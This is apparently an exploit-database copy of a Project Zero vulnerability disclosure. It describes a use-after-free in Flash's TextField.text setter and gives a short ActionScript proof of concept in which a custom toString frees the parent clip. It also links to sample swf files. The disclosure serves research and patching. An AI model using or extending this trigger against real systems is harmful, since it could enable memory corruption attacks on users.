23 lines
No EOL
716 B
Text
23 lines
No EOL
716 B
Text
Source: https://code.google.com/p/google-security-research/issues/detail?id=576
|
|
|
|
There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
|
|
|
|
var mc = this.createEmptyMovieClip("mc", 101);
|
|
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
|
|
tf.text = {toString : func};
|
|
|
|
function func(){
|
|
|
|
mc.removeMovieClip();
|
|
|
|
// Fix heap here
|
|
|
|
return "natalie";
|
|
|
|
}
|
|
|
|
A sample swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39053.zip |